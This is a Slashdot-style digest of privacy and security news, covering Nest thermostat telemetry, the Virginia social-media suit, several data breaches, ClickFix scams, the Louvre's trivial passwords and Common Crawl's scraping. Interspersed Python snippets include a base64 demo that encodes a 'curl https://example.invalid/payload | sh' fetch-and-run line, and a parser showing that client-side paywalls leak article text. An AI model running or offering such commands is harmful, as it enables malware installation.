Google

Google Is Collecting Troves of Data From Downgraded Nest Thermostats 11

Even after disabling remote control and officially ending support for early Nest Learning Thermostats, Google is still receiving detailed sensor and activity data from these devices, including temperature changes, motion, and ambient light. The Verge reports: After digging into the backend, security researcher Cody Kociemba found that the first- and second-generation Nest Learning Thermostats are still sending Google information about manual temperature changes, whether a person is present in the room, if sunlight is hitting the device, and more. Kociemba made the discovery while participating in a bounty program created by FULU, a right-to-repair advocacy organization cofounded by electronics repair technician and YouTuber Louis Rossmann.

FULU challenged developers to come up with a solution to restore smart functionality to Nest devices no longer supported by Google, and that's exactly what Kociemba did with his open-source No Longer Evil project. But after cloning Google's API to create this custom software, he started receiving a trove of logs from customer devices, a data stream he promptly shut off. "On these devices, while they [Google] turned off access to remotely control them, they did leave in the ability for the devices to upload logs. And the logs are pretty extensive," Kociemba tells The Verge. [...] "I was under the impression that the Google connection would be severed along with the remote functionality, however that connection is not severed, and instead is a one-way street," Kociemba says.
The Courts

NetChoice Sues Virginia To Block Its One-Hour Social Media Limit For Kids (theverge.com) 30

NetChoice is suing Virginia to block a new law that limits kids under 16 to one hour of daily social media use unless parents approve more time, arguing the rule violates the First Amendment and introduces serious privacy risks through mandatory age-verification. The Verge reports: In addition to restricting access to legal speech, NetChoice alleges that Virginia's incoming law (SB 854) will require platforms to verify user ages in ways that would pose privacy and security risks. The law requires platforms to use "commercially reasonable methods," which it says include a screen that prompts the user to enter a birth date. However, NetChoice argues that Virginia could go beyond this requirement, citing a post from Governor Youngkin on X, stating "platforms must verify age," potentially referring to stricter methods, like having users submit a government ID or other personal information.
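The birth-date screen described above reduces to a simple completed-years calculation, which is easy to get wrong around the birthday boundary. A minimal sketch (the function names are hypothetical, not taken from SB 854 or any platform's actual code):

```python
from datetime import date

def age_on(birth_date: date, today: date) -> int:
    """Return completed years between birth_date and today."""
    years = today.year - birth_date.year
    # Subtract one year if this year's birthday hasn't happened yet.
    if (today.month, today.day) < (birth_date.month, birth_date.day):
        years -= 1
    return years

def needs_parental_approval(birth_date: date, today: date) -> bool:
    # The law, per the summary above, applies to users under 16.
    return age_on(birth_date, today) < 16
```

Of course, a self-reported birth date is trivially falsified, which is precisely why the stricter verification methods NetChoice warns about (government IDs, personal documents) are where the privacy risk lies.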

NetChoice, which is backed by tech giants like Meta, Google, Amazon, Reddit, and Discord, alleges that the law puts a burden on minors' ability to engage or consume speech online. "The First Amendment prohibits the government from placing these types of restrictions on accessing lawful and valuable speech, just in the same way that the government can't tell you how long you could spend reading a book, watching a television program, or consuming a documentary," Paul Taske, the co-director of the Netchoice Litigation Center, tells The Verge.

"Virginia must leave the parenting decisions where they belong: with parents," Taske says. "By asserting that authority for itself, Virginia not only violates its citizens' rights to free speech but also exposes them to increased risk of privacy and security breaches."

AI

Could Firefox Be the Browser That Protects the Privacy of AI Users? (anildash.com) 54

Tech entrepreneur/blogger Anil Dash has been critical of AI browsers like ChatGPT Atlas. (He's written that Atlas "substitutes its own AI-generated content for the web, but it looks like it's showing you the web," that its prompt-based/command-line interface resembles a clunky text adventure, and that its true purpose seems to be ingesting more training data.)

And at the Mozilla Festival in Spain, "Virtually everyone shared some version of what I'd articulated as the majority view on AI, which is approximately that LLMs can be interesting as a technology, but that Big Tech, and especially Big AI, are decidedly awful and people are very motivated to stop them from committing their worst harms upon the vulnerable."

But... Another reality that people were a little more quiet in acknowledging, and sometimes reluctant to engage with out loud, is the reality that hundreds of millions of people are using the major AI tools every day... I don't know why today's Firefox users, even if they're the most rabid anti-AI zealots in the world, don't say, "well, even if I hate AI, I want to make sure Firefox is good at protecting the privacy of AI users so I can recommend it to my friends and family who use AI"...

My personal wishlist would be pretty simple:

* Just give people the "shut off all AI features" button. It's a tiny percentage of people who want it, but they're never going to shut up about it, and they're convinced they're the whole world; they can't distinguish between being mad at big companies and being mad at a technology. So give them a toggle switch and write up a blog post explaining how extraordinarily expensive it is to maintain a configuration option over the lifespan of a global product.

* Market Firefox as "The best AI browser for people who hate Big AI". Regular users have no idea how creepy the Big AI companies are — they've just heard their local news talk about how AI is the inevitable future. If Mozilla can warn me how to protect my privacy from ChatGPT, then it can also mention that ChatGPT tells children how to self-harm, and should be aggressive in engaging with the community on how to build tools that help mitigate those kinds of harms — how do we catalyze that innovation?

* Remind people that there isn't "a Firefox" — everyone is Firefox. Whether it's Zen, or your custom build of Firefox with your favorite extensions and skins, it's all part of the same story. Got a local LLM that runs entirely as a Firefox extension? Great! That should be one of the many Firefoxes, too. Right now, so much of the drama and heightened emotions and tension are coming from people's (well... dudes') egos about there being One True Firefox, and wanting to be the one who controls what's in that version, as an expression of one set of values. This isn't some blood-feud fork, there can just be a lot of different choices for different situations. Make it all work.

Privacy

Logitech Reports Data Breach From Zero-Day Software Vulnerability (nerds.xyz) 5

BrianFagioli writes: Logitech has confirmed a cybersecurity breach after an intruder exploited a zero-day in a third-party software platform and copied internal data. The company says the incident did not affect its products, manufacturing or business operations, and it does not believe sensitive personal information like national ID numbers or credit card data were stored in the impacted system. The attacker still managed to pull limited information tied to employees, consumers, customers and suppliers, raising fair questions about how long the zero-day existed before being patched.

Logitech brought in outside cybersecurity firms, notified regulators and says the incident will not materially affect its financial results. The company expects its cybersecurity insurance policy to cover investigation costs and any potential legal or regulatory issues. Still, with zero-day attacks increasing across the tech world, even established hardware brands are being forced to acknowledge uncomfortable weaknesses in their internal systems.

Privacy

Hyundai Data Breach May Have Leaked Drivers' Personal Information (caranddriver.com) 54

According to Car and Driver, Hyundai has suffered a data breach that leaked the personal data of up to 2.7 million customers. The leak reportedly took place in February from Hyundai AutoEver, the company's IT affiliate. It includes customer names, driver's license numbers, and social security numbers. Longtime Slashdot reader sinij writes: Thanks to tracking modules plaguing most modern cars, that data likely includes the times and locations of customers' vehicles. These repeated breaches make it clear that, unlike smartphone manufacturers that are inherently tech companies, car manufacturers collecting your data are going to keep getting breached and leaking it.
Privacy

Proton Might Recycle Abandoned Email Addresses (nerds.xyz) 30

BrianFagioli writes: Popular privacy firm Proton is floating a plan on Reddit that should unsettle anyone who values privacy, writes Nerds.xyz. The company is considering recycling abandoned email addresses that were originally created by bots a decade ago. These addresses were never used, yet many of them are extremely common names that have silently collected misdirected emails, password reset attempts, and even entries in breach datasets. Handing those addresses to new owners today would mean that sensitive messages intended for completely different people could start landing in a stranger's inbox overnight.

Proton says it's just gathering feedback, but the fact that this made it far enough to ask the community is troubling. Releasing these long-abandoned addresses would create confusion, risk exposure of personal data, and undermine the trust users place in a privacy-focused provider. It's hard to see how Proton could justify taking a gamble with other people's digital identities like this.

The Courts

OpenAI Fights Order To Turn Over Millions of ChatGPT Conversations (reuters.com) 69

An anonymous reader quotes a report from Reuters: OpenAI asked a federal judge in New York on Wednesday to reverse an order that required it to turn over 20 million anonymized ChatGPT chat logs amid a copyright infringement lawsuit by the New York Times and other news outlets, saying it would expose users' private conversations. The artificial intelligence company argued that turning over the logs would disclose confidential user information and that "99.99%" of the transcripts have nothing to do with the copyright infringement allegations in the case.

"To be clear: anyone in the world who has used ChatGPT in the past three years must now face the possibility that their personal conversations will be handed over to The Times to sift through at will in a speculative fishing expedition," the company said in a court filing (PDF). The news outlets argued that the logs were necessary to determine whether ChatGPT reproduced their copyrighted content and to rebut OpenAI's assertion that they "hacked" the chatbot's responses to manufacture evidence. The lawsuit claims OpenAI misused their articles to train ChatGPT to respond to user prompts.

Magistrate Judge Ona Wang said in her order to produce the chats that users' privacy would be protected by the company's "exhaustive de-identification" and other safeguards. OpenAI has a Friday deadline to produce the transcripts.

Google

Google Is Introducing Its Own Version of Apple's Private AI Cloud Compute 23

Google has unveiled Private AI Compute, a cloud platform designed to deliver advanced AI capabilities while preserving user privacy. As The Verge notes, the feature is "virtually identical to Apple's Private Cloud Compute." From the report: Many Google products run AI features such as translation, audio summaries, and chatbot assistants on-device, meaning data doesn't leave your phone, Chromebook, or whatever it is you're using. This isn't sustainable, Google says, as advancing AI tools need more reasoning and computational power than devices can supply. The compromise is to ship more difficult AI requests to a cloud platform, called Private AI Compute, which it describes as a "secure, fortified space" offering the same degree of security you'd expect from on-device processing. Sensitive data is available "only to you and no one else, not even Google."
Security

ClickFix May Be the Biggest Security Threat Your Family Has Never Heard Of (arstechnica.com) 79

An anonymous reader quotes a report from Ars Technica: ClickFix often starts with an email sent from a hotel that the target has a pending registration with and references the correct registration information. In other cases, ClickFix attacks begin with a WhatsApp message. In still other cases, the user receives the URL at the top of Google results for a search query. Once the mark accesses the malicious site referenced, it presents a CAPTCHA challenge or other pretext requiring user confirmation. The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. Once entered, the string of text causes the PC or Mac to surreptitiously visit a scammer-controlled server and download malware. Then, the machine automatically installs it -- all with no indication to the target. With that, users are infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. The lack of awareness of the technique, combined with the links also coming from known addresses or in search results, and the ability to bypass some endpoint protections are all factors driving the growth.

The commands, which are often base-64 encoded to make them unreadable to humans, are often copied inside the browser sandbox, a part of most browsers that accesses the Internet in an isolated environment designed to protect devices from malware or harmful scripts. Many security tools are unable to observe and flag these actions as potentially malicious. The attacks can also be effective given the lack of awareness. Many people have learned over the years to be suspicious of links in emails or messengers. In many users' minds, the precaution doesn't extend to sites that instruct them to copy a piece of text and paste it into an unfamiliar window. When the instructions come in emails from a known hotel or at the top of Google results, targets can be further caught off guard. With many families gathering in the coming weeks for various holiday dinners, ClickFix scams are worth mentioning to those family members who ask for security advice. Microsoft Defender and other endpoint protection programs offer some defenses against these attacks, but they can, in some cases, be bypassed. That means that, for now, awareness is the best countermeasure.
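Since the pasted strings are often just base64-wrapped commands, decoding the blob before running anything makes the trick visible. A hedged sketch with a benign stand-in payload (the URL is fake, and the helper name is my own):

```python
import base64
import re

def decode_if_base64(text: str) -> str:
    """Best-effort decode of a base64 blob copied from a 'verification' page."""
    stripped = re.sub(r"\s+", "", text)
    try:
        return base64.b64decode(stripped, validate=True).decode("utf-8")
    except Exception:
        return text  # not valid base64; return unchanged

# Benign stand-in for the kind of string a ClickFix page asks a victim to paste:
encoded = base64.b64encode(b"curl https://example.invalid/payload | sh").decode()
print(decode_if_base64(encoded))  # curl https://example.invalid/payload | sh
```

The real defense, of course, is never pasting commands from a webpage into a terminal at all; decoding merely shows what the opaque string would have done.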
Researchers from CrowdStrike described in a report a campaign designed to infect Macs with a Mach-O executable. "Promoting false malicious websites encourages more site traffic, which will lead to more potential victims," wrote the researchers. "The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim's machine while bypassing Gatekeeper checks."

Push Security, meanwhile, reported a ClickFix campaign that uses a device-adaptive page that serves different malicious payloads depending on whether the visitor is on Windows or macOS.
Firefox

Firefox 145 Drops Support For 32-bit Linux (nerds.xyz) 28

BrianFagioli writes: Mozilla has released Firefox 145.0, and the standout change in this version is the official end of support for 32-bit Linux systems. Users on 32-bit distributions will no longer receive updates and are being encouraged to switch to the 64-bit build to continue getting security patches and new features. While most major Linux distributions have already moved past 32-bit support, this shift will still impact older hardware users and lightweight community projects that have held on to 32-bit for the sake of performance or preservation.
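For readers unsure whether their machine is affected, the userland word size can be checked in a few lines. This is a rough sketch that reflects the interpreter and kernel rather than Firefox itself (a 32-bit userland can run on a 64-bit kernel):

```python
import platform
import sys

def is_64bit_userland() -> bool:
    # A 64-bit interpreter has pointers wider than 32 bits.
    return sys.maxsize > 2**32

print(platform.machine())     # e.g. 'x86_64' on 64-bit x86, 'i686' on 32-bit
print(is_64bit_userland())
```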

The rest of the update introduces features such as built-in PDF comments, improved fingerprinting resistance for private browsing, tab group previews, password management in the sidebar, and minor UI refinements. Firefox also now compresses local translation models with Zstandard to reduce storage needs. But the end of 32-bit Linux support is the change that will leave the biggest mark, signaling another step toward a web ecosystem firmly centered on 64-bit computing.

Security

A Jailed Hacking Kingpin Reveals All About Cybercrime Gang (bbc.com) 19

Slashdot reader alternative_right shares an exclusive BBC interview with Vyacheslav "Tank" Penchukov, once a top-tier cyber-crime boss behind Jabber Zeus, IcedID, and major ransomware campaigns. His story traces the evolution of modern cybercrime from early bank-theft malware to today's lucrative ransomware ecosystem, marked by shifting alliances, Russian security-service ties, and the paranoia that ultimately consumes career hackers. Here's an excerpt from the report: In the late 2000s, he and the infamous Jabber Zeus crew used revolutionary cyber-crime tech to steal directly from the bank accounts of small businesses, local authorities and even charities. Victims saw their savings wiped out and balance sheets upended. In the UK alone, there were more than 600 victims, who lost more than $5.2 million in just three months. Between 2018 and 2022, Penchukov set his sights higher, joining the thriving ransomware ecosystem with gangs that targeted international corporations and even a hospital. [...]

Penchukov says he did not think about the victims, and he does not seem to do so much now, either. The only sign of remorse in our conversation was when he talked about a ransomware attack on a disabled children's charity. His only real regret seems to be that he became too trusting with his fellow hackers, which ultimately led to him and many other criminals being caught. "You can't make friends in cyber-crime, because the next day, your friends will be arrested and they will become an informant," he says. "Paranoia is a constant friend of hackers," he says. But success leads to mistakes. "If you do cyber-crime long enough you lose your edge," he says, wistfully.

EU

Critics Call Proposed Changes To Landmark EU Privacy Law 'Death By a Thousand Cuts' (reuters.com) 27

An anonymous reader quotes a report from Reuters: Privacy activists say proposed changes to Europe's landmark privacy law, including making it easier for Big Tech to harvest Europeans' personal data for AI training, would flout EU case law and gut the legislation. The changes proposed by the European Commission are part of a drive to simplify a slew of laws adopted in recent years on technology, environmental and financial issues which have in turn faced pushback from companies and the U.S. government.

EU antitrust chief Henna Virkkunen will present the Digital Omnibus, in effect proposals to cut red tape and overlapping legislation such as the General Data Protection Regulation, the Artificial Intelligence Act, the e-Privacy Directive and the Data Act, on November 19. According to the plans, Google, Meta Platforms, OpenAI and other tech companies may be allowed to use Europeans' personal data to train their AI models based on legitimate interest.

In addition, companies may be exempted from the ban on processing special categories of personal data "in order not to disproportionately hinder the development and operation of AI and taking into account the capabilities of the controller to identify and remove special categories of personal data." [...] The proposals would need to be thrashed out with EU countries and European Parliament in the coming months before they can be implemented.
"The draft Digital Omnibus proposes countless changes to many different articles of the GDPR. In combination this amounts to a death by a thousand cuts," Austrian privacy group noyb said in a statement. "This would be a massive downgrading of Europeans' privacy 10 years after the GDPR was adopted," noyb's Max Schrems said.

"These proposals would change how the EU protects what happens inside your phone, computer and connected devices," European Digital Rights policy advisor Itxaso Dominguez de Olazabal wrote in a LinkedIn post. "That means access to your device could rely on legitimate interest or broad exemptions like security, fraud detection or audience measurement," she said.
Google

Did ChatGPT Conversations Leak... Into Google Search Console Results? (arstechnica.com) 51

"For months, extremely personal and sensitive ChatGPT conversations have been leaking into an unexpected destination," reports Ars Technica: the search-traffic tool for webmasters, Google Search Console.

Though it normally shows the short phrases or keywords typed into Google which led someone to their site, "starting this September, odd queries, sometimes more than 300 characters long, could also be found" in Google Search Console. And the chats "appeared to be from unwitting people prompting a chatbot to help solve relationship or business problems, who likely expected those conversations would remain private." Jason Packer, owner of analytics consulting firm Quantable, flagged the issue in a detailed blog post last month, telling Ars Technica he'd seen 200 odd queries, including "some pretty crazy ones." (Web optimization consultant Slobodan Manić helped Packer investigate...) Packer points out that nobody clicked "share" or was given an option to prevent their chats from being exposed. Packer suspected that these queries were connected to reporting from The Information in August that cited sources claiming OpenAI was scraping Google search results to power ChatGPT responses. Sources claimed that OpenAI was leaning on Google to answer prompts to ChatGPT seeking information about current events, like news or sports... "Did OpenAI go so fast that they didn't consider the privacy implications of this, or did they just not care?" Packer posited in his blog... Clearly some of those searches relied on Google, Packer's blog said, mistakenly sending to GSC "whatever" the user says in the prompt box... This means "that OpenAI is sharing any prompt that requires a Google Search with both Google and whoever is doing their scraping," Packer alleged. "And then also with whoever's site shows up in the search results! Yikes."

To Packer, it appeared that "ALL ChatGPT prompts" that used Google Search risked being leaked during the past two months. OpenAI claimed only a small number of queries were leaked but declined to provide a more precise estimate. So, it remains unclear how many of the 700 million people who use ChatGPT each week had prompts routed to Google Search Console.

"Perhaps most troubling to some users — whose identities are not linked in chats unless their prompts perhaps share identifying information — there does not seem to be any way to remove the leaked chats from Google Search Console."
AI

Common Crawl Criticized for 'Quietly Funneling Paywalled Articles to AI Developers' (msn.com) 42

For more than a decade, the nonprofit Common Crawl "has been scraping billions of webpages to build a massive archive of the internet," notes the Atlantic, making it freely available for research. "In recent years, however, this archive has been put to a controversial purpose: AI companies including OpenAI, Google, Anthropic, Nvidia, Meta, and Amazon have used it to train large language models."

"In the process, my reporting has found, Common Crawl has opened a back door for AI companies to train their models with paywalled articles from major news websites. And the foundation appears to be lying to publishers about this — as well as masking the actual contents of its archives..." Common Crawl's website states that it scrapes the internet for "freely available content" without "going behind any 'paywalls.'" Yet the organization has taken articles from major news websites that people normally have to pay for — allowing AI companies to train their LLMs on high-quality journalism for free. Meanwhile, Common Crawl's executive director, Rich Skrenta, has publicly made the case that AI models should be able to access anything on the internet. "The robots are people too," he told me, and should therefore be allowed to "read the books" for free. Multiple news publishers have requested that Common Crawl remove their articles to prevent exactly this use. Common Crawl says it complies with these requests. But my research shows that it does not.

I've discovered that pages downloaded by Common Crawl have appeared in the training data of thousands of AI models. As Stefan Baack, a researcher formerly at Mozilla, has written, "Generative AI in its current form would probably not be possible without Common Crawl." In 2020, OpenAI used Common Crawl's archives to train GPT-3. OpenAI claimed that the program could generate "news articles which human evaluators have difficulty distinguishing from articles written by humans," and in 2022, an iteration on that model, GPT-3.5, became the basis for ChatGPT, kicking off the ongoing generative-AI boom. Many different AI companies are now using publishers' articles to train models that summarize and paraphrase the news, and are deploying those models in ways that steal readers from writers and publishers.

Common Crawl maintains that it is doing nothing wrong. I spoke with Skrenta twice while reporting this story. During the second conversation, I asked him about the foundation archiving news articles even after publishers have asked it to stop. Skrenta told me that these publishers are making a mistake by excluding themselves from "Search 2.0" — referring to the generative-AI products now widely being used to find information online — and said that, anyway, it is the publishers that made their work available in the first place. "You shouldn't have put your content on the internet if you didn't want it to be on the internet," he said. Common Crawl doesn't log in to the websites it scrapes, but its scraper is immune to some of the paywall mechanisms used by news publishers. For example, on many news websites, you can briefly see the full text of any article before your web browser executes the paywall code that checks whether you're a subscriber and hides the content if you're not. Common Crawl's scraper never executes that code, so it gets the full articles.
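The client-side paywall mechanism described above is easy to demonstrate offline: the full article ships in the markup, and only a script hides it after the page loads, so a scraper that never executes JavaScript sees everything. A sketch using a made-up page (no real publisher's markup):

```python
from html.parser import HTMLParser

# Simulated raw HTML: the article text is present in the response body;
# a script would hide it client-side for non-subscribers after load.
RAW_HTML = """
<html><body>
  <article><p>Full article text, visible in the raw response.</p></article>
  <script>
    // pseudo-paywall: would hide the article if the reader isn't a subscriber
  </script>
</body></html>
"""

class TextExtractor(HTMLParser):
    """Collect visible text, skipping script contents, without running any JS."""
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if not self.in_script and data.strip():
            self.chunks.append(data.strip())

parser = TextExtractor()
parser.feed(RAW_HTML)
print(parser.chunks)  # the 'paywalled' article text is right there
```

Defeating this requires the publisher to withhold the article server-side until the subscription check passes, which is exactly the harder engineering that client-side paywalls avoid.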

Thus, by my estimate, the foundation's archives contain millions of articles from news organizations around the world, including The Economist, the Los Angeles Times, The Wall Street Journal, The New York Times, The New Yorker, Harper's, and The Atlantic.... A search for nytimes.com in any crawl from 2013 through 2022 shows a "no captures" result, when in fact there are articles from NYTimes.com in most of these crawls.

"In the past year, Common Crawl's CCBot has become the scraper most widely blocked by the top 1,000 websites," the article points out...
Privacy

Unesco Adopts Global Standards On 'Wild West' Field of Neurotechnology (theguardian.com) 14

Unesco has adopted the first global ethical standards for neurotechnology, defining "neural data" and outlining more than 100 recommendations aimed at safeguarding mental privacy. "There is no control," said Unesco's chief of bioethics, Dafna Feinholz. "We have to inform the people about the risks, the potential benefits, the alternatives, so that people have the possibility to say 'I accept, or I don't accept.'" The Guardian reports: She said the new standards were driven by two recent developments in neurotechnology: artificial intelligence (AI), which offers vast possibilities in decoding brain data, and the proliferation of consumer-grade neurotech devices such as earbuds that claim to read brain activity and glasses that track eye movements.

The standards define a new category of data, "neural data," and suggest guidelines governing its protection. A list of more than 100 recommendations ranges from rights-based concerns to addressing scenarios that are -- at least for now -- science fiction, such as companies using neurotechnology to subliminally market to people during their dreams.
"Neurotechnology has the potential to define the next frontier of human progress, but it is not without risks," said Unesco's director general, Audrey Azoulay. The new standards would "enshrine the inviolability of the human mind," she said.
Android

Gemini Starts Rolling Out On Android Auto 7

Gemini is (finally) rolling out on Android Auto, replacing Google Assistant while keeping "Hey Google," adding Gemini Live ("let's talk live"), message auto-translation, and new privacy toggles. "One feature lost between Assistant and Gemini, though, is the ability to use nicknames for contacts," notes 9to5Google. From the report: Over the past 24 hours, Google has quietly started the rollout of Gemini for Android Auto, seemingly starting with beta users. The change is server-side, with multiple users reporting that Gemini has gone live in the car. One user mentions that they noticed this on Android Auto 15.6, and we're seeing the same on our Pixel 10 Pro XL connected to different car displays, and also on a Galaxy Z Fold 7 running Android Auto 15.7.

It's unclear if this particular version is what delivers support, but that seems unlikely seeing as this very version started rolling out last week. Android Auto 15.6 and 15.7 are currently only available in beta, so it's also unclear at this time if the rollout is tied to the Android Auto beta or simply showing up on that version as a coincidence.
Security

US Congressional Budget Office Hit By Suspected Foreign Cyberattack (bleepingcomputer.com) 26

An anonymous reader quotes a report from BleepingComputer: The U.S. Congressional Budget Office (CBO) confirms it suffered a cybersecurity incident after a suspected foreign hacker breached its network, potentially exposing sensitive data. In a statement shared with BleepingComputer, CBO spokesperson Caitlin Emma confirmed the "security incident" and said the agency acted quickly to contain it. "The Congressional Budget Office has identified the security incident, has taken immediate action to contain it, and has implemented additional monitoring and new security controls to further protect the agency's systems going forward," Emma told BleepingComputer.

"The incident is being investigated and work for the Congress continues. Like other government agencies and private sector entities, CBO occasionally faces threats to its network and continually monitors to address those threats." The Washington Post first reported the breach, stating that officials discovered the hack in recent days and are now concerned that emails and exchanges between congressional offices and the CBO's analysts may have been exposed. While officials have reportedly told lawmakers they believe the intrusion was detected early, some congressional offices have allegedly halted emails with the CBO out of security concerns.

Privacy

The Louvre's Video Surveillance Password Was 'Louvre' (pcgamer.com) 90

A bungled October 18 heist that saw $102 million of crown jewels stolen from the Louvre in broad daylight has exposed years of lax security at the national art museum. From trivial passwords like 'LOUVRE' to decades-old, unsupported systems and easy rooftop access, the job was made surprisingly easy. PC Gamer reports: As Rogue cofounder and former Polygon arch-jester Cass Marshall notes on Bluesky, we owe a lot of videogame designers an apology. We've spent years dunking on the emptyheadedness of game characters leaving their crucial security codes and vault combinations in the open for anyone to read, all while the Louvre has been using the password "Louvre" for its video surveillance servers. That's not an exaggeration. Confidential documents reviewed by Liberation detail a long history of Louvre security vulnerabilities, dating back to a 2014 cybersecurity audit performed by the French Cybersecurity Agency (ANSSI) at the museum's request. ANSSI experts were able to infiltrate the Louvre's security network to manipulate video surveillance and modify badge access.

"How did the experts manage to infiltrate the network? Primarily due to the weakness of certain passwords which the French National Cybersecurity Agency (ANSSI) politely describes as 'trivial,'" writes Liberation's Brice Le Borgne via machine translation. "Type 'LOUVRE' to access a server managing the museum's video surveillance, or 'THALES' to access one of the software programs published by... Thales." The museum sought another audit from France's National Institute for Advanced Studies in Security and Justice in 2015. Concluded two years later, the audit's 40 pages of recommendations described "serious shortcomings," "poorly managed" visitor flow, rooftops that are easily accessible during construction work, and outdated and malfunctioning security systems. Later documents indicate that, in 2025, the Louvre was still using security software purchased in 2003 that is no longer supported by its developer, running on hardware using Windows Server 2003.
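The "trivial" passwords ANSSI flagged, i.e. the site's own name, are exactly what the most minimal blocklist check rejects. A hypothetical sketch, not any system the Louvre or Thales actually runs:

```python
def is_trivial_password(password: str, org_names: list[str]) -> bool:
    """Flag passwords that are too short or contain the organization's own name."""
    p = password.lower()
    return len(p) < 12 or any(name.lower() in p for name in org_names)

# The actual offenders from the audit would fail immediately:
print(is_trivial_password("LOUVRE", ["Louvre", "Thales"]))                 # True
print(is_trivial_password("correct-horse-battery", ["Louvre", "Thales"]))  # False
```

Even this ten-line gate would have caught both passwords cited in the audit, which is the point: the failure was procedural, not technical.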

Privacy

Data Breach At Major Swedish Software Supplier Impacts 1.5 Million (bleepingcomputer.com) 6

A massive cyberattack on Swedish IT supplier Miljodata exposed personal data from up to 1.5 million citizens, prompting a national privacy investigation and scrutiny into security failures across multiple municipalities. BleepingComputer reports: Miljödata is an IT systems supplier for roughly 80% of Sweden's municipalities. The company disclosed the incident on August 25, saying that the attackers stole data and demanded 1.5 Bitcoin to not leak it. The attack caused operational disruptions that affected citizens in multiple regions in the country, including Halland, Gotland, Skelleftea, Kalmar, Karlstad, and Monsteras.

Because of the large impact, the state monitored the situation from the time of disclosure, with CERT-SE and the police starting to investigate immediately. According to IMY, the attacker exposed on the dark web data that corresponds to 1.5 million people in the country, creating the basis for investigating potential General Data Protection Regulation (GDPR) violations. [...] Although no ransomware groups had claimed the attack when Miljodata disclosed the incident, BleepingComputer found that the threat group Datacarry posted the stolen data on its dark web portal on September 13.
The leaked database has been added to Have I Been Pwned, which contains information such as names, email addresses, physical addresses, phone numbers, government IDs, and dates of birth.
Businesses

Amazon Accuses Perplexity of Computer Fraud, Demands It Stop AI Agent From Buying On Its Site (bloomberg.com) 44

Amazon has sent a cease-and-desist letter to Perplexity AI demanding that the AI search startup stop allowing its AI browser agent, Comet, to make purchases online for users. From a report: The e-commerce giant is accusing Perplexity of committing computer fraud by failing to disclose when its AI agent is shopping on a user's behalf, in violation of Amazon's terms of service, according to people familiar with the letter sent on Friday. The document also said Perplexity's tool degraded the Amazon shopping experience and introduced privacy vulnerabilities, said the people, who spoke on condition of anonymity to discuss internal matters.

In response, Perplexity said Amazon is bullying a smaller competitor with a rival AI agent shopping product. The clash between Amazon and Perplexity offers an early glimpse into a looming debate over how to handle the proliferation of so-called AI agents that field more complex tasks online for users, including shopping. Like OpenAI and Alphabet's Google, Perplexity has pushed to rethink the traditional web browser around AI, with the goal of having it streamline more actions for users, such as drafting emails and conducting research.
